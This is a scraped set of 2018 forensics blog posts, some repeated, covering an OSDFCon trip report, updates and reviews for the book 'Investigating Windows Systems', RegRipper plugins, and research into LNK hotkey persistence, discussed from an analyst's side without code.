Some other things to consider, as well...yes, unintentional evidence artifacts often are quirky and have exceptions, which means they are very often misunderstood and misinterpreted. Consider the example of Shim Cache entry from Chris's blog post; in my experience, this is perhaps the most commonly misinterpreted artifact to date, for the simple fact that the time stamps are commonly referred to as the "date of execution". Another aspect of this artifact is that it's taken as standalone, and should not be...there may be evidence of time stomping occurring prior to the file being included as a Shim Cache record.
Finally, Chris is absolutely correct that many of these artifacts have poor documentation, if they have any at all. I see this as a short-coming of the community, not of the vendor. The simple fact is that, as a community, we're so busy pushing ahead that we aren't stopping to consider the value to the community as a whole that we're leaving behind. Yes, the vendor may poorly document an artifact, or the documentation may simply be part of the source code that we cannot see, but what we're not doing as a community is documenting and sharing our findings. There've been too many instances during my years doing DFIR work that I would share something with someone who would respond with, "oh, yeah...we've seen that before" only to have no documentation, not even a Notepad document or something scribbled on a napkin to which they can refer me. This is a loss for everyone.
Saturday, October 20, 2018
OSDFCon Trip Report
This past week I attended the 9th OSDFCon...not my 9th, as I haven't been able to make all of them. In fact, I haven't been able to make it for a couple of years. However, this return trip did not disappoint. I've always really enjoyed the format of the conference, the layout, and more importantly, the people. OSDFCon is well attended, with lots of great talks, and I always end up leaving there with much more than I showed up with.
Interestingly enough, one speaker could not make it at the last minute, and Brian simply shifted the room schedule a bit to better accommodate people. He clearly understood the nature of the business we're in, and the absent presenter suffered no apparent consequences as a result. This wasn't one of the lightning talks at the end of the day, this was one of the talks during the first half of the conference, where everyone was in the same room. It was very gracious of Brian to simply roll with it and move on.
The Talks
Unfortunately, I didn't get a chance to attend all of the talks that I wanted to see. At OSDFCon, by its very nature, you see people you haven't seen in a while, and want to catch up. Or, as is very often the case, you see people you only know from online. And then, of course, you meet people you know only from online because they decide to drop in, as a surprise.
However, I do like the format. Talk times are much shorter, which not only falls in line with my attention span, but also gets the speakers to focus a bit more, which is really great, from the perspective of the listener, as well as the speaker. I also like the lightning talks...short snippets of info that someone puts together quickly, very often focusing on the fact that they have only 5 mins, and therefore distilling it down, and boiling away the extra fluff.
My Talk
I feel my talk went pretty well, but then, there's always the bias of "it's my talk". I was pleasantly surprised when I turned around just before kicking the talk off to find the room pretty packed, with people standing in the back. I try to make things entertaining, and I don't want to put everything I'm going to say on the slides, mostly because it's not about me talking at the audience, as much as its about us engaging. As such, there's really no point in me providing my slide pack to those who couldn't attend the presentation, because the slides are just place holders, and the real value of the presentation comes from the engagement.
In short, the purpose of my talk was that I wanted to let people know that if they're just downloading RegRipper and running the GUI, they aren't getting the full power out of the tool. I added a command line switch to rip.exe earlier this year ("rip -uP") that will run through the plugins folder, and recreate all of the default profiles (software, sam, system, ntuser, usrclass, amcache, all) based on the "hive" field in the config headers of the plugin.
To-Do
Something that is a recurring theme of this conference is how to get folks new to the community to contribute and keep the community alive, as well as how to just get folks in the community to contribute. Well, a couple of things came out of my talk that might be of interest to someone in the community.
One way to contribute is this...someone asked if there was a way to determine for which version of Windows a plugin was written. There is a field in the %config header metadata that can be used for that purpose, but there's no overall list or table that identifies the Windows version for which a plugin was written. For example, there are two plugins that extract information about user searches from the NTUSER.DAT hive, one for XP (acmru.pl) and one for Vista+ (wordwheelquery.pl). There's really no point in running acmru.pl against an NTUSER.DAT from a Windows 7 system.
So, one project that someone might want to take on is to put together a table or spreadsheet that provides this list. Just sayin'...and I'm sure that there are other ideas as to projects or things folks can do to contribute.
For example, some talks I'd love to see is how folks (not the authors) use the various open source tools that are available in order to solve problems. Actually, this could easily start out as a blog post, and then morph into a presentation...how did someone use an open source tool (or several tools) to solve a problem that they ran into? This might make a great "thunder talk"...10 to 15 min talks at the next OSDFCon, where the speaker shares the issue, and then how they went about solving it. Something like this has multiple benefits...it could illustrate the (or, a novel) use of the tool(s), as well as give DFIR folks who haven't spoken in front of a group before a chance to dip their toe in that pool.
Conversations
Like I said, a recurring theme of the conference is getting those in the community, even those new to the community, involved in keeping the community alive, in some capacity. Jessica said something several times that struck home with me...that it's up to those of us who've been in the community for a while to lead the way, not by telling, but by doing. Now, not everyone's going to be able to, or even want to, contribute in the same way. For example, many folks may not feel that they can contribute by writing tools, which is fine. But a way you can contribute is by using the tools and then sharing how you used them. Another way to contribute is by writing reviews of books and papers; by "writing reviews", I don't mean a table of contents, but instead something more in-depth (books and papers usually already have a table of contents).
Shout Outz
Brian Carrier, Mari DeGrazia, Jessica Hyde, Jared Greenhill, Brooke Gottlieb, Mark McKinnon/Mark McKinnon, Cory Altheide, Cem Gurkok, Thomas Millar, the entire Volatility crew, Ali Hadi, Yogesh Khatri, the PolySwarm folks...I tried to get everyone, and I apologize for anyone I may have missed!
Also, I have to give a huge THANK YOU to the Basis Tech folks who came out, the vendors who were there, and to the hotel staff for helping make this conference go off without a hitch.
Final Words
As always, OSDFCon is well-populated and well-attended. There was a slack channel established for the conference (albeit not by Brian or his team, but it was available), and the Twitter hashtag for the conference seems to have been pretty well-used.
To follow up on some of the above-mentioned conversations, many of us who've been around for a while (or more than just "a while") are also willing to do more than lead by doing. Many of us are also willing to answer questions...so ask. Some of us are also willing to mentor and help folks in a more direct and meaningful manner. Never presented before, but feel like you might want to? Some of us are willing to help in a way that goes beyond just sending an email or tweet of encouragement. Just ask.
Interestingly enough, one speaker could not make it at the last minute, and Brian simply shifted the room schedule a bit to better accommodate people. He clearly understood the nature of the business we're in, and the absent presenter suffered no apparent consequences as a result. This wasn't one of the lightning talks at the end of the day, this was one of the talks during the first half of the conference, where everyone was in the same room. It was very gracious of Brian to simply roll with it and move on.
The Talks
Unfortunately, I didn't get a chance to attend all of the talks that I wanted to see. At OSDFCon, by its very nature, you see people you haven't seen in a while, and want to catch up. Or, as is very often the case, you see people you only know from online. And then, of course, you meet people you know only from online because they decide to drop in, as a surprise.
However, I do like the format. Talk times are much shorter, which not only falls in line with my attention span, but also gets the speakers to focus a bit more, which is really great, from the perspective of the listener, as well as the speaker. I also like the lightning talks...short snippets of info that someone puts together quickly, very often focusing on the fact that they have only 5 mins, and therefore distilling it down, and boiling away the extra fluff.
My Talk
I feel my talk went pretty well, but then, there's always the bias of "it's my talk". I was pleasantly surprised when I turned around just before kicking the talk off to find the room pretty packed, with people standing in the back. I try to make things entertaining, and I don't want to put everything I'm going to say on the slides, mostly because it's not about me talking at the audience, as much as its about us engaging. As such, there's really no point in me providing my slide pack to those who couldn't attend the presentation, because the slides are just place holders, and the real value of the presentation comes from the engagement.
In short, the purpose of my talk was that I wanted to let people know that if they're just downloading RegRipper and running the GUI, they aren't getting the full power out of the tool. I added a command line switch to rip.exe earlier this year ("rip -uP") that will run through the plugins folder, and recreate all of the default profiles (software, sam, system, ntuser, usrclass, amcache, all) based on the "hive" field in the config headers of the plugin.
To-Do
Something that is a recurring theme of this conference is how to get folks new to the community to contribute and keep the community alive, as well as how to just get folks in the community to contribute. Well, a couple of things came out of my talk that might be of interest to someone in the community.
One way to contribute is this...someone asked if there was a way to determine for which version of Windows a plugin was written. There is a field in the %config header metadata that can be used for that purpose, but there's no overall list or table that identifies the Windows version for which a plugin was written. For example, there are two plugins that extract information about user searches from the NTUSER.DAT hive, one for XP (acmru.pl) and one for Vista+ (wordwheelquery.pl). There's really no point in running acmru.pl against an NTUSER.DAT from a Windows 7 system.
So, one project that someone might want to take on is to put together a table or spreadsheet that provides this list. Just sayin'...and I'm sure that there are other ideas as to projects or things folks can do to contribute.
For example, some talks I'd love to see is how folks (not the authors) use the various open source tools that are available in order to solve problems. Actually, this could easily start out as a blog post, and then morph into a presentation...how did someone use an open source tool (or several tools) to solve a problem that they ran into? This might make a great "thunder talk"...10 to 15 min talks at the next OSDFCon, where the speaker shares the issue, and then how they went about solving it. Something like this has multiple benefits...it could illustrate the (or, a novel) use of the tool(s), as well as give DFIR folks who haven't spoken in front of a group before a chance to dip their toe in that pool.
Conversations
Like I said, a recurring theme of the conference is getting those in the community, even those new to the community, involved in keeping the community alive, in some capacity. Jessica said something several times that struck home with me...that it's up to those of us who've been in the community for a while to lead the way, not by telling, but by doing. Now, not everyone's going to be able to, or even want to, contribute in the same way. For example, many folks may not feel that they can contribute by writing tools, which is fine. But a way you can contribute is by using the tools and then sharing how you used them. Another way to contribute is by writing reviews of books and papers; by "writing reviews", I don't mean a table of contents, but instead something more in-depth (books and papers usually already have a table of contents).
Shout Outz
Brian Carrier, Mari DeGrazia, Jessica Hyde, Jared Greenhill, Brooke Gottlieb, Mark McKinnon/Mark McKinnon, Cory Altheide, Cem Gurkok, Thomas Millar, the entire Volatility crew, Ali Hadi, Yogesh Khatri, the PolySwarm folks...I tried to get everyone, and I apologize for anyone I may have missed!
Also, I have to give a huge THANK YOU to the Basis Tech folks who came out, the vendors who were there, and to the hotel staff for helping make this conference go off without a hitch.
Final Words
As always, OSDFCon is well-populated and well-attended. There was a slack channel established for the conference (albeit not by Brian or his team, but it was available), and the Twitter hashtag for the conference seems to have been pretty well-used.
To follow up on some of the above-mentioned conversations, many of us who've been around for a while (or more than just "a while") are also willing to do more than lead by doing. Many of us are also willing to answer questions...so ask. Some of us are also willing to mentor and help folks in a more direct and meaningful manner. Never presented before, but feel like you might want to? Some of us are willing to help in a way that goes beyond just sending an email or tweet of encouragement. Just ask.
Sunday, October 07, 2018
Updates
IWS
Folks have started receiving the copies of IWS they ordered, and folks like Joey and Mary Ellen have already posted reviews! Mary Ellen has also gone so far as to post her review the Amazon page for the book!
Some have also pointed out that the XP image from Lance's practical is no longer available. Sorry about that but I was using the image, and don't have access to, nor control over the site itself. However, the focus of the book is the process, and choosing to use available images, I thought, would provide more value, as readers could follow along.
Addendum, 7 Oct: Thanks to the wonderful folks from the TwitterVerse who pointed out archive.org as a resource, the XP image can be found here!
Speaking of images, I got an interesting tweet the other day, asking why Windows 10 wasn't mentioned in ch. 2 of the book. The short answer is two-fold; one, because it wasn't used/addressed. For the second part of the answer, I'd refer back to a blog post I'd written two years ago when I started writing IWS, specifically the section of the post entitled "The "Ask"". Okay, I know that there's a lot going on in the TwitterVerse, and that two year is multiple lifetimes in Internet time. And I know that not everyone sees nor ingests everything, and for those who do see things or tweets, if they have no relevance at the time, then "meh". I get it. I'm subject to it myself.
Okay, so, just to be clear...I'm not addressing that tweet in order to call someone out for not paying attention, or missing something. Not at all. I felt that this was a very good opportunity to provide clarity around and set expectations regarding the book, now that it's out. The longer response to the tweet question, the one that doesn't fit neatly into a tweet, is also two-fold; one, I could not find a Windows 10 image online that would have fit that into that chapter. The idea at the core of writing the book was to provide a view into the analysis process, so that analysts could have something with which they could follow along.
The second part of the answer is that it's about the process; the analysis process should hold regardless of the version of Windows examined. Yes, the technical and tactical mechanics may change, but the process itself holds, or should hold. So, rather than focusing on, "wow, there's a whole section that addresses Windows XP...WTF??", I'd ask that the focus should be on documenting an analysis plan, documenting case notes, and documenting what was learned from the analysis, and then rolling that right back into the analysis process. After all, the goal of the book is NOT to state that this is THE way to analyze a Windows system for malware, but to show the value of having a living, breathing, growing, documented, repeatable analysis process.
Also, I was engaged in analyzing systems impacted by NotPetya during the early summer of 2017. Another analyst on our team received several images from an impacted client, all of which were XP and 2003. So, yes, those systems are still out there and still actively being used by clients.
Books
One of the challenges of writing books is keeping people informed as to what's coming, and giving them the opportunity to have input. For example, after IWS was published, someone who follows me on social media said that they had no idea that there was a new book coming out. I wanted to take the opportunity (again) to let others know what was coming, what I'm working on, in an effort to not just set expectations, but to see if anyone has any thoughts or comments that might drive the content itself.
T his new book is titled Practical Windows Investigations, and the current chapters are:
1. Core Concepts
2. How to analyze Windows Event Logs
3. How to get the most out of RegRipper
4. Malware Detection
5. How to determine data exfiltration
6. File (LNK, DOCX/DOC, PDF) Analysis
7. How to investigate lateral movement
8. How to investigate program execution
9. How to investigate user activity
10. How to correlate/associate a device with a user (USB, Bluetooth)
11. How to detect/analyze the use of anti-forensics
12. Making use of VSCs
PWI differs from the current IWS in that it's about halfway between my previous books and IWS. What I mean by that is my previous books listed artifacts, how to parse them, their potential value during an investigation, but left it to the analyst to stitch the analysis together. IWS was more of a cradle-to-grave approach to an investigation, relying on publicly available images so that a reader could follow along, if they chose to do so. As such, IWS was somewhat restricted to what was available; PWI is intended to address some of those things that weren't available through the images used in IWS.
I'm going to leave that right there...
RegRipper Plugins
I recently released a couple of new plugins. One is "appkeys.pl", which offers an interesting persistence mechanism, based on Adam's blog post. Oh, and there's the fact that it's been seen in the wild, too...so, yeah.
The other is "slack.pl", which extracts slack space from Registry cells, and parses the retrieved data for keys and values. In my own testing, I've got it parsing keys and values, but just the data from those cell types. As of yet, I haven't seen a value cell, for example, that included the value data, just the name. It's there if you need it, and I hope folks find value in it.
LNK Parsing
While doing some research into LNK 'hotkeys' recently, I ran across Adam's blog post regarding the use of the AppKey subkeys in the Registry. I found this pretty fascinating, even though I do not have media keys on my keyboard, and as such, I wrote a plugin (aptly named "appkeys.pl") to pull this information from the Registry. I also created "appkeys_tln.pl" to extract those subkeys with "ShellExecute" values, and send the info to STDOUT in TLN format.
Adam also pointed out in his post that this isn't something that was entirely theoretical; it's been seen in the wild. As such, something like this takes on even greater significance.
Adam also provided a link to MS's keyboard mappings. By default, the subkey numbered "17" points to a CLSID, which translates to "My Computer".
Fun with Flags
There was a really interesting Twitter thread recently regarding a BSides Perth talk on APT LNK files. During the thread, Nick Carr pointed out MS had recently updated their LNK format specification documentation. During the discussion, Silas mentioned the LinkFlags field, and I thought, oh, here's a great opportunity to write another blog post, and work in a "The Big Bang Theory" reference. More to the point, however, I thought that by parsing the LinkFlags field, there might be an opportunity to identify toolmarks from whatever tool or process was used to create the LNK file. As such, I set about updating my parser to not only look for those documented flags that are set, but to also check the unused flags. I should also note that Silas recently updated his Python-based LNK parser, as well.
During a follow-on exchange on Twitter on the topic, @Malwageddon pointed me to this sample, and I downloaded a copy, naming it simply "iris" on my analysis system. I had to disable Windows Defender on my system, as downloading it or accessing it in any way, even via one of my tools, causes the file to be quarantined.
Doing a Google search for "dikona", I found this ISC handler post, authored by Didier Stevens. Didier's explanation is very thorough.
In order to do some additional testing, I used the VBS code available from Adam's blog post to create a LNK file that includes a "hotkey" field. In Adam's example, he uses a hotkey that isn't covered in the MS documentation, and illustrates that other hotkeys can be used, particularly for malicious purposes. For example, I modified Adam's example LNK file to launch the Calculator when the "Caps Lock" key was hit; it worked like a champ, even when I hit the "Caps Lock" key a second time to turn off the functionality on my keyboard. Now, image making that LNK file hidden from view on the Desktop...it does make a very interesting malware persistence method.
Additional Stuff:
Values associated with the ShowWindow function - the LNK file documentation describes a 4 byte ShowCommand value, and only includes 3 values with their descriptions in the specification; however, there are other values, as demonstrated in Adam's post.
Support in the Industry
On 4 July, Alexis tweeted regarding the core reasons that should be behind our motivation for giving back to the community. Yes, I get that this tweet was directed at content producers, as well as those who might be thinking about producing content. His statement about the community not owing us engagement or feedback is absolutely correct, however disheartening I might have found that statement, and the realization, to be. But like I said, he's right. So, if you're going to share something, first look at why you're sharing. If you're doing it to get feedback (like I very often do...), then you have to accept that you're likely not going to get it. If you're okay with that, cool...fire away. This is something I've had to come to grips with, and doing so has changed the way (and what) I share. I think that it also predicates how others share, as well. What I mean is, why put in the effort of a thorough write-up in a blog post or an article, publishing it somewhere, when it's so much easier to just put it into a tweet (or two, or twelve...). In fact, by tweeting it, you'll likely get much more feedback (in likes and RTs) than you would otherwise, even though stuff tweeted has a lifespan comparable to a fruit fly.
More recently, Alexis shared this blog post. I thought that this was a very interesting perspective to take, given that when I've engaged with others specifically about just offering a "thank you", I've gotten back some pretty extreme, absolutist comments in return. For example, when I suggested that if someone shares a program or script that you find useful, one should say, "thank you", one tweeter responded that he's not going to say "thank you" every time he uses the script. That's a little extreme, not what I intended, and not what I was suggesting at all. But I do support Alexis' statement; if you find value in something that someone else put out there, express your gratitude in some manner. Say "thank you", write a review of the tool, comment on the blog post, whatever. While the imposter syndrome appears to be something that an individual needs to deal with, I think as a community, we can all help others overcome their own imposter syndrome by providing some sort of feedback.
As a side note, the imposter syndrome is not something isolated to the DFIR community...not at all. I've talked to a number of folks in other communities (threat intel, etc.) who have expressed realization of their own imposter syndrome.
Alexis also shared some additional means by which the community can support efforts in the field, and one that comes to mind is the request made by the good folks at Arsenal Recon. Their image mounter, called "AIM", provides a great capability, one that they're willing to improve with support from the community.
Folks have started receiving the copies of IWS they ordered, and folks like Joey and Mary Ellen have already posted reviews! Mary Ellen has also gone so far as to post her review the Amazon page for the book!
Some have also pointed out that the XP image from Lance's practical is no longer available. Sorry about that but I was using the image, and don't have access to, nor control over the site itself. However, the focus of the book is the process, and choosing to use available images, I thought, would provide more value, as readers could follow along.
Addendum, 7 Oct: Thanks to the wonderful folks from the TwitterVerse who pointed out archive.org as a resource, the XP image can be found here!
Speaking of images, I got an interesting tweet the other day, asking why Windows 10 wasn't mentioned in ch. 2 of the book. The short answer is two-fold; one, because it wasn't used/addressed. For the second part of the answer, I'd refer back to a blog post I'd written two years ago when I started writing IWS, specifically the section of the post entitled "The "Ask"". Okay, I know that there's a lot going on in the TwitterVerse, and that two year is multiple lifetimes in Internet time. And I know that not everyone sees nor ingests everything, and for those who do see things or tweets, if they have no relevance at the time, then "meh". I get it. I'm subject to it myself.
Okay, so, just to be clear...I'm not addressing that tweet in order to call someone out for not paying attention, or missing something. Not at all. I felt that this was a very good opportunity to provide clarity around and set expectations regarding the book, now that it's out. The longer response to the tweet question, the one that doesn't fit neatly into a tweet, is also two-fold; one, I could not find a Windows 10 image online that would have fit that into that chapter. The idea at the core of writing the book was to provide a view into the analysis process, so that analysts could have something with which they could follow along.
The second part of the answer is that it's about the process; the analysis process should hold regardless of the version of Windows examined. Yes, the technical and tactical mechanics may change, but the process itself holds, or should hold. So, rather than focusing on, "wow, there's a whole section that addresses Windows XP...WTF??", I'd ask that the focus should be on documenting an analysis plan, documenting case notes, and documenting what was learned from the analysis, and then rolling that right back into the analysis process. After all, the goal of the book is NOT to state that this is THE way to analyze a Windows
1. Core Concepts
2. How to analyze Windows Event Logs
3. How to get the most out of RegRipper
4. Malware Detection
5. How to determine data exfiltration
6. File (LNK, DOCX/DOC, PDF) Analysis
7. How to investigate lateral movement
8. How to investigate program execution
9. How to investigate user activity
10. How to correlate/associate a device with a user (USB, Bluetooth)
11. How to detect/analyze the use of anti-forensics
12. Making use of VSCs
RegRipper Plugins
I recently released a couple of new plugins. One is "appkeys.pl", which offers an interesting persistence mechanism, based on Adam's blog post. Oh, and there's the fact that it's been seen in the wild, too...so, yeah.
The other is "slack.pl", which extracts slack space from Registry cells, and parses the retrieved data for keys and values. In my own testing, I've got it parsing keys and values, but just the data from those cell types. As of yet, I haven't seen a value cell, for example, that included the value data, just the name. It's there if you need it, and I hope folks find value in it.
LNK Parsing
While doing some research into LNK 'hotkeys' recently, I ran across Adam's blog post regarding the use of the AppKey subkeys in the Registry. I found this pretty fascinating, even though I do not have media keys on my keyboard, and as such, I wrote a plugin (aptly named "appkeys.pl") to pull this information from the Registry. I also created "appkeys_tln.pl" to extract those subkeys with "ShellExecute" values, and send the info to STDOUT in TLN format.
Adam also pointed out in his post that this isn't something that was entirely theoretical; it's been seen in the wild. As such, something like this takes on even greater significance.
Adam also provided a link to MS's keyboard mappings. By default, the subkey numbered "17" points to a CLSID, which translates to "My Computer".
Fun with Flags
There was a really interesting Twitter thread recently regarding a BSides Perth talk on APT LNK files. During the thread, Nick Carr pointed out MS had recently updated their LNK format specification documentation. During the discussion, Silas mentioned the LinkFlags field, and I thought, oh, here's a great opportunity to write another blog post, and work in a "The Big Bang Theory" reference. More to the point, however, I thought that by parsing the LinkFlags field, there might be an opportunity to identify toolmarks from whatever tool or process was used to create the LNK file. As such, I set about updating my parser to not only look for those documented flags that are set, but to also check the unused flags. I should also note that Silas recently updated his Python-based LNK parser, as well.
During a follow-on exchange on Twitter on the topic, @Malwageddon pointed me to this sample, and I downloaded a copy, naming it simply "iris" on my analysis system. I had to disable Windows Defender on my system, as downloading it or accessing it in any way, even via one of my tools, causes the file to be quarantined.
Doing a Google search for "dikona", I found this ISC handler post, authored by Didier Stevens. Didier's explanation is very thorough.
In order to do some additional testing, I used the VBS code available from Adam's blog post to create a LNK file that includes a "hotkey" field. In Adam's example, he uses a hotkey that isn't covered in the MS documentation, and illustrates that other hotkeys can be used, particularly for malicious purposes. For example, I modified Adam's example LNK file to launch the Calculator when the "Caps Lock" key was hit; it worked like a champ, even when I hit the "Caps Lock" key a second time to turn off the functionality on my keyboard. Now, image making that LNK file hidden from view on the Desktop...it does make a very interesting malware persistence method.
Additional Stuff:
Values associated with the ShowWindow function - the LNK file documentation describes a 4 byte ShowCommand value, and only includes 3 values with their descriptions in the specification; however, there are other values, as demonstrated in Adam's post.
Support in the Industry
On 4 July, Alexis tweeted regarding the core reasons that should be behind our motivation for giving back to the community. Yes, I get that this tweet was directed at content producers, as well as those who might be thinking about producing content. His statement about the community not owing us engagement or feedback is absolutely correct, however disheartening I might have found that statement, and the realization, to be. But like I said, he's right. So, if you're going to share something, first look at why you're sharing. If you're doing it to get feedback (like I very often do...), then you have to accept that you're likely not going to get it. If you're okay with that, cool...fire away. This is something I've had to come to grips with, and doing so has changed the way (and what) I share. I think that it also predicates how others share, as well. What I mean is, why put in the effort of a thorough write-up in a blog post or an article, publishing it somewhere, when it's so much easier to just put it into a tweet (or two, or twelve...). In fact, by tweeting it, you'll likely get much more feedback (in likes and RTs) than you would otherwise, even though stuff tweeted has a lifespan comparable to a fruit fly.
More recently, Alexis shared this blog post. I thought that this was a very interesting perspective to take, given that when I've engaged with others specifically about just offering a "thank you", I've gotten back some pretty extreme, absolutist comments in return. For example, when I suggested that if someone shares a program or script that you find useful, one should say, "thank you", one tweeter responded that he's not going to say "thank you" every time he uses the script. That's a little extreme, not what I intended, and not what I was suggesting at all. But I do support Alexis' statement; if you find value in something that someone else put out there, express your gratitude in some manner. Say "thank you", write a review of the tool, comment on the blog post, whatever. While the imposter syndrome appears to be something that an individual needs to deal with, I think as a community, we can all help others overcome their own imposter syndrome by providing some sort of feedback.
As a side note, the imposter syndrome is not something isolated to the DFIR community...not at all. I've talked to a number of folks in other communities (threat intel, etc.) who have expressed realization of their own imposter syndrome.
Alexis also shared some additional means by which the community can support efforts in the field, and one that comes to mind is the request made by the good folks at Arsenal Recon. Their image mounter, called "AIM", provides a great capability, one that they're willing to improve with support from the community.
Sunday, September 23, 2018
First Review of IWS
The written first review of IWS comes from Joey Victorino, a consultant with the IBM X-Force IRIS team. Joey sent me his review via LinkedIn, and graciously allowed me to post it here. Here are Joey's thoughts on the book, in his own words:
I've been a fan of Harlan Carvey ever since his first release of Windows Forensic Analysis, 2nd Edition book years ago when I first entered the digital forensics environment. Initially, I had reservations that the new book "Investigating Windows Systems" would be a bit simplistic as I've read quite a bit of forensics books and attended multiple SANS Courses. However, I was wrong, and I really enjoyed this book - especially because Harlan Carvey is an awesome analyst. Essentially, it looks into different scenarios a DFIR professional will encounter throughout their career, by unpacking these scenarios through the eyes of a professional analyst. After the initial evidence is triaged it is then broken down into a conversation about the scenario, with clear examples of what the artifacts are like in this stage of the investigation and then provides practical examples in identifying actionable data and leveraging that as a pivot point to uncover more data. Because of the spread of knowledge, I found it very interesting and very useful to cover off areas where I was a bit unfamiliar with the subject matter. My favorite was "Chapter 4" as it went into Ali Hadi’s “Web Server Case” in a fantastic manner. I've been using this challenge as a method to train junior analysts and another IT professional moving into the DFIR field. His approach to solving the exercise was a great example, of being a consultant performing on-site DFIR with a focus on getting the answers needed quickly, and in a proper manner to be able to allow clients to make important business decisions. Overall, the greatest message learned from this book is that even though there are many different tools, the most effective skill a forensic analyst can have is being able to investigate properly, by analyzing the correct data, and using it to clearly answer the important questions. This would be an excellent book to not only have on the shelf but read and actively reference for DFIR practitioners of all experience levels. Joey Victorino – Consultant IBM X-Force IRIS
Thanks, Joey, for your kind words, and thanks taking the time to share your thoughts on the book. Most importantly, thank you for purchasing and reading my book! My hope is that others find similar interest and value in what I've written.
Addendum, 26 Sept: Mary Ellen posted a review, as well!
I've been a fan of Harlan Carvey ever since his first release of Windows Forensic Analysis, 2nd Edition book years ago when I first entered the digital forensics environment. Initially, I had reservations that the new book "Investigating Windows Systems" would be a bit simplistic as I've read quite a bit of forensics books and attended multiple SANS Courses. However, I was wrong, and I really enjoyed this book - especially because Harlan Carvey is an awesome analyst. Essentially, it looks into different scenarios a DFIR professional will encounter throughout their career, by unpacking these scenarios through the eyes of a professional analyst. After the initial evidence is triaged it is then broken down into a conversation about the scenario, with clear examples of what the artifacts are like in this stage of the investigation and then provides practical examples in identifying actionable data and leveraging that as a pivot point to uncover more data. Because of the spread of knowledge, I found it very interesting and very useful to cover off areas where I was a bit unfamiliar with the subject matter. My favorite was "Chapter 4" as it went into Ali Hadi’s “Web Server Case” in a fantastic manner. I've been using this challenge as a method to train junior analysts and another IT professional moving into the DFIR field. His approach to solving the exercise was a great example, of being a consultant performing on-site DFIR with a focus on getting the answers needed quickly, and in a proper manner to be able to allow clients to make important business decisions. Overall, the greatest message learned from this book is that even though there are many different tools, the most effective skill a forensic analyst can have is being able to investigate properly, by analyzing the correct data, and using it to clearly answer the important questions. This would be an excellent book to not only have on the shelf but read and actively reference for DFIR practitioners of all experience levels. Joey Victorino – Consultant IBM X-Force IRIS
Thanks, Joey, for your kind words, and thanks taking the time to share your thoughts on the book. Most importantly, thank you for purchasing and reading my book! My hope is that others find similar interest and value in what I've written.
Addendum, 26 Sept: Mary Ellen posted a review, as well!
Tuesday, September 18, 2018
Book Writing
With the release of my latest book, Investigating Windows Systems, I thought that now would be a good time to revisit the topic of writing books. It occurred to me watching some of the activity and comments on social media that there were likely folks who hadn't seen my previous posts on this topic, let alone the early stuff I'd posted about the book, particularly the stuff I'd written about the book two years ago.
As I said, I've blogged on the topic of writing (DFIR) books before:
17 Dec 2010
26 Dec 2010
28 Mar 2014
29 Mar 2014
16 Feb 2018
There are some things about writing books that many folks out there simply may not be aware of, particular if they haven't written a book themselves. One such item, for example, is that the author doesn't own the books. I had a sales guy set up an event that he wanted me to attend, and he suggested that I "bring some books to sell". I don't own the books to sell, and as far as I'm aware, I'm not PCI compliant; I don't process credit cards.
Further, authors have little, if any, control over...well, anything beyond the content, unless they're self-published. For example, I'm fully aware that as of 17 Sept 2018, the image on the Amazon page for IWS is still the place holder that was likely used when the page was originally set up. I did reach to the publisher about this, and they let me know that this is an issue that they've had with the vendor, not just with my book but with many others, as well. While I can, and do, market the books to the extent that I can, I have no control over, nor any input into, what marketing the publisher does, if any. Nor do authors have any input or control over what the publisher's vendors do, or don't do, as the case may be.
Addendum, 19 Sept: I checked again today, and the Amazon page for the book has been updated with the proper book cover image.
Taking a quick look through a copy of the Investigating Windows Systems book, I noted a few things that jumped out at me. I did see a misspelled word or two, read a sentence here and there that seemed awkward and required a re-read (and maybe a re-write), and noticed an image or two that could have been bigger and more visible. Would the book have looked a bit better if it had a bit bigger form factor? Perhaps. Then it would have been thinner. However, my point is that I didn't have any input into that aspect of the book.
I'm also aware that several pages (pp. 1, 45, 73, 97) have something unusual at the bottom of the page. Specifically, "Investigating Windows Systems. DOI: https://doi.org/10.1016/{random}", and then immediately below that, a copyright notice. Yes, this does stand out like a sore thumb, and no, I have no idea why it's there.
If you purchased or received a copy of the book, I hope you find value in it. As I've said before, I wanted to take a different approach with this book, and produce something new and I hope, useful.
As I said, I've blogged on the topic of writing (DFIR) books before:
17 Dec 2010
26 Dec 2010
28 Mar 2014
29 Mar 2014
16 Feb 2018
There are some things about writing books that many folks out there simply may not be aware of, particular if they haven't written a book themselves. One such item, for example, is that the author doesn't own the books. I had a sales guy set up an event that he wanted me to attend, and he suggested that I "bring some books to sell". I don't own the books to sell, and as far as I'm aware, I'm not PCI compliant; I don't process credit cards.
Further, authors have little, if any, control over...well, anything beyond the content, unless they're self-published. For example, I'm fully aware that as of 17 Sept 2018, the image on the Amazon page for IWS is still the place holder that was likely used when the page was originally set up. I did reach to the publisher about this, and they let me know that this is an issue that they've had with the vendor, not just with my book but with many others, as well. While I can, and do, market the books to the extent that I can, I have no control over, nor any input into, what marketing the publisher does, if any. Nor do authors have any input or control over what the publisher's vendors do, or don't do, as the case may be.
Addendum, 19 Sept: I checked again today, and the Amazon page for the book has been updated with the proper book cover image.
Taking a quick look through a copy of the Investigating Windows Systems book, I noted a few things that jumped out at me. I did see a misspelled word or two, read a sentence here and there that seemed awkward and required a re-read (and maybe a re-write), and noticed an image or two that could have been bigger and more visible. Would the book have looked a bit better if it had a bit bigger form factor? Perhaps. Then it would have been thinner. However, my point is that I didn't have any input into that aspect of the book.
I'm also aware that several pages (pp. 1, 45, 73, 97) have something unusual at the bottom of the page. Specifically, "Investigating Windows Systems. DOI: https://doi.org/10.1016/{random}", and then immediately below that, a copyright notice. Yes, this does stand out like a sore thumb, and no, I have no idea why it's there.
If you purchased or received a copy of the book, I hope you find value in it. As I've said before, I wanted to take a different approach with this book, and produce something new and I hope, useful.